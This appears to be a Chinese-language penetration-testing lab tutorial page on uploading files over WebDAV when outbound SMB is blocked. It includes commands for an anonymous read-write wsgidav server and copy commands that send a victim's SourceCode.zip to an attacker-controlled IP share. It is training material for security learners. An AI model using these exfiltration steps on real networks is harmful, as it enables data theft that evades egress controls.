SMB 上传

我们之前讨论过，企业通常允许使用 HTTP (TCP/80) 和 HTTPS (TCP/443) 协议向外传输流量。企业通常不允许 SMB 协议（TCP/445）离开内部网络，因为这会使企业面临潜在的攻击。有关这方面的更多信息，我们可以阅读 Microsoft 的文章《防止横向连接和进出网络的 SMB 流量》

另一种方法是通过 WebDav 在 HTTP 上运行 SMB。WebDAV (RFC 4918) 是 HTTP 的扩展，HTTP 是网络浏览器和网络服务器用于相互通信的互联网协议。WebDAV 协议使网络服务器能像文件服务器一样运行，支持协作内容创作。WebDAV 还可以使用 HTTPS。

使用 SMB 时，它会首先尝试使用 SMB 协议进行连接，如果没有可用的 SMB 共享，它就会尝试使用 HTTP 进行连接。在下面的 Wireshark 截图中，我们尝试连接到文件共享 testing3，由于没有找到 SMB，所以使用了 HTTP。

配置 WebDav 服务器

要设置我们的 WebDav 服务器，我们需要安装两个 Python 模块，wsgidav并且cheroot（您可以在此处阅读有关此实现的更多信息：wsgidav github）。wsgidav安装它们后，我们在目标目录中运行应用程序。

安装 WebDav Python 模块

AcesMin@htb[/htb]$ sudo pip install wsgidav cheroot

[sudo] password for plaintext: 
Collecting wsgidav
  Downloading WsgiDAV-4.0.1-py3-none-any.whl (171 kB)
     |████████████████████████████████| 171 kB 1.4 MB/s
     ...SNIP...

使用 WebDav Python 模块

AcesMin@htb[/htb]$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 

[sudo] password for plaintext: 
Running without configuration file.
10:02:53.949 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
10:02:53.950 - INFO    : WsgiDAV/4.0.1 Python/3.9.2 Linux-5.15.0-15parrot1-amd64-x86_64-with-glibc2.31
10:02:53.950 - INFO    : Lock manager:      LockManager(LockStorageDict)
10:02:53.950 - INFO    : Property manager:  None
10:02:53.950 - INFO    : Domain controller: SimpleDomainController()
10:02:53.950 - INFO    : Registered DAV providers by route:
10:02:53.950 - INFO    :   - '/:dir_browser': FilesystemProvider for path '/usr/local/lib/python3.9/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
10:02:53.950 - INFO    :   - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous)
10:02:53.950 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
10:02:53.950 - WARNING : Share '/' will allow anonymous write access.
10:02:53.950 - WARNING : Share '/:dir_browser' will allow anonymous read access.
10:02:54.194 - INFO    : Running WsgiDAV/4.0.1 Cheroot/8.6.0 Python 3.9.2
10:02:54.194 - INFO    : Serving on http://0.0.0.0:80 ...

连接到 Webdav 共享

现在我们可以尝试使用目录连接到共享DavWWWRoot。

C:\htb> dir \\192.168.49.128\DavWWWRoot

 Volume in drive \\192.168.49.128\DavWWWRoot has no label.
 Volume Serial Number is 0000-0000

 Directory of \\192.168.49.128\DavWWWRoot

05/18/2022  10:05 AM    <DIR>          .
05/18/2022  10:05 AM    <DIR>          ..
05/18/2022  10:05 AM    <DIR>          sharefolder
05/18/2022  10:05 AM                13 filetest.txt
               1 File(s)             13 bytes
               3 Dir(s)  43,443,318,784 bytes free

注意： DavWWWRoot是Windows Shell 识别的特殊关键字。您的 WebDAV 服务器上不存在此类文件夹。DavWWWRoot 关键字告诉微型重定向器驱动程序，该驱动程序处理您要连接到 WebDAV 服务器根的 WebDAV 请求。如果在连接到服务器时指定服务器上存在的文件夹，则可以避免使用此关键字。例如：\192.168.49.128\sharefolder

使用 SMB 上传文件

C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

注意：如果没有 SMB (TCP/445) 限制，您可以按照我们为下载操作设置的方式使用 impacket-smbserver。

上一页PowerShell Base64 Web 上传方法下一页FTP 上传

最后更新于1年前

这有帮助吗？